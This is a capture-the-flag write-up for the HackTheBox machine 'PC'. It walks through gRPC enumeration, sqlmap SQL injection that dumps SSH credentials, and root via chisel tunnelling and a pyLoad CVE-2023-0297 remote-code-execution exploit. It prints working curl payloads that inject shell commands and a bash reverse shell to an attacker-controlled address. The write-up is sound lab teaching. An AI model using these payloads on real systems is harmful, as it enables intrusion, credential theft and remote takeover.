PC

HackTheBox PC writeup by Thamizhiniyan C S

PreviousNodeBlog NextBeginner Track

Last updated 1 year ago

Was this helpful?

PC

HackTheBox PC writeup by Thamizhiniyan C S

Overview

Greetings everyone,

In this write-up, we will tackle PC from HackTheBox.

Machine link:

Difficulty Level: Easy

Let's Begin 🙌

Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. to learn more about how to connect to VPN and access the boxes.

Once connected to the VPN service, click on "Join Machine" to access the machine's IP.

Upon joining the machine, you will be able to view the IP address of the target machine.

Reconnaissance

Rustscan

rustscan -a 10.10.11.214

Nmap Agressive Scan

nmap -A -T4 -p 22,50051 -Pn <IP>

Results

From the results of rustscan, we can see that two ports are open. One is SSH and the other is unknown.

Port

Service

Version/Technology

SSH

OpenSSH 8.2p1

50051

Information Gathering - Port 50051

On further looking out for exploits for this service, I found this writeup:

from which I found the following tool:

After installing the tool, run the following command: grpcui -plaintext 10.10.11.214:50051

And also from the above write-up, I inferred that this service might be vulnerable to SQL Injection.

Initial Access

Now visit the grpcui Web UI hosted at [http://127.0.0.1:43021](http://127.0.0.1:43021) [ Note: The port number might differ in your case ]

We can see that the gRPC service is a SimpleApp with register, login and getinfo features.

I first registered a new user.

username: something

password: something

Successfully created a user with the name something

Next I tried to login with the created user.

Successfully logged in!!! We got the id and the token for the user something. Note the id and token.

Now I tried the getinfo feature. I used the id and token that we noted in the previous step.

My Request was successful, but there was no details in the response, instead it was an empty object.

Now we are able to successfully send request to the getInfo feature. The id value in the getinfo tab might be vulnerable to SQL injection. So I again tried the getInfo function, but this time I captured the request with burpsuite and I saved the request as a file.

sqlmap

Now using the saved request file, I used sqlmap to check out for SQL Injection using the following command:

sqlmap -r request --flush-session --threads 10 --batch -p id --level 3 --risk 3
// Here:
// --flush-session : optional command, Flush session files for current target
// --threads : to mention the number of threads to be utilized
// --batch : Never ask for user input, use the default behavior
// --level : Level of tests to perform (1-5, default 1) 
// --risk : Risk of tests to perform (1-3, default 1)
// -p : to specify the Testable parameter(s)

From the output of sqlmap, we can see that the id parameter is vulnerable to SQL Injection and from the output we can see that the database used by the gRPC service is sqlite.

Now we can dump the database using the following command:

sqlmap -r request --flush-session --threads 10 --batch -p id --level 3 --risk 3 --dump
// Here:
// --flush-session : optional command, Flush session files for current target
// --threads : to mention the number of threads to be utilized
// --batch : Never ask for user input, use the default behavior
// --level : Level of tests to perform (1-5, default 1) 
// --risk : Risk of tests to perform (1-3, default 1)
// -p : to specify the Testable parameter(s)
// --dump : Dump DBMS database table entries

From the results of sqlmap, we have found a new credential:

username: sau

password: HereIsYourPassWord1431

I tried to login via SSH using the above credentials and got in.

Getting the User Flag

I listed out the current directory and found the user flag.

And also, in the current directory, found the following tools:

chisel - A fast TCP tunnel over HTTP.

linpeas.sh - it is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.

Privilege Escalation

I first ran [linpeas.sh](http://linpeas.sh) , looking out for privilege escalation vectors.

Method 1

From the output of linpeas.sh, we can see that the /usr/bin/bash has a SUID bit set on it.

We have successfully escalated our privileges.

Method 2

From the output of linpeas.sh, we can see that a service is running on port 8000 locally on the target machine.

We can use chisel to create a proxy/tunnel to access this service on our local machine/attack box.

To do that we have to have the same version of chisel on both attacking and target machine.

First lets check the chisel version available in the target machine.

The target machine has chisel version 1.8.1.

Download the same version of chisel on your attacking machine.

Now from the attacking machine run the following command to create the chisel sever:

chisel server -p 9001 --reverse

Next on the target machine run the following command to setup the client and also to port forward the internal service:

chisel client <HTB_tunnel_IP>:9001 R:5000:localhost:8000

Once you run the above command, if you check the server, you can see that the connection is established.

Now in the attack machine, go to localhost:5000 to take a look at the service running on the target machine.

You can see that, pyload is running on the target machine on port 8000 internally.

From another terminal, I logged in via SSH to the target machine as sau to check the version of pyload running.

The version of pyload running is 0.5.0. On searching exploits for this version of payload, found the following website: https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad , which showcased the RCE vulnerability on this version of pyload.

We have found the exploit. Now we can modify it to our needs and run the exploit.

Note: The above exploit can execute only one command at a time. Don’t try to chain a series of commands, it won’t work. Run the commands one by one.

First we are going to create a [reverse.sh](http://reverse.sh) shell file on the target machine in any directory, in this case we are using the /tmp directory. To do this run the following modified exploit:

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/rev.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://127.0.0.1:5000/flash/addcrypted2'

// Commands are URL encoded

If we run the above exploit, we can see that an error is thrown.

But if we open another terminal and login to the target machine via SSH as sau and check the /tmp directory we can see that a rev.sh file is created with root permissions.

Now we have to provide permissions to all the users to read, write and execute, since the owner of the file is root. To do this use the following exploit:

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"chmod%20777%20/tmp/rev.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://127.0.0.1:5000/flash/addcrypted2'

// Commands are URL encoded

After executing the above command, if check the file permissions of the [rev.sh](http://rev.sh) file, you can see that all users have all permissions.

Now we can edit the [rev.sh](http://rev.sh) file. Add the following content to the rev.sh file to create a reverse shell.

#! /bin/bash
bash -i >& /dev/tcp/<HTB_tunnel_IP>/9002 0>&1

Don’t try to execute the reverse shell from the target machine, as you will get the reverse shell only with the privileges of sau , as the rev.sh file is executed by that user.

Before executing the reverse shell, start a netcat listener on the attacking machine.

Now run the following command to execute the reverse shell as root:

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"/tmp/rev.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://127.0.0.1:5000/flash/addcrypted2'

// Commands are URL encoded

After executing the above command, check the netcat listener that you created.

We have successfully obtained the reverse shell with root privileges.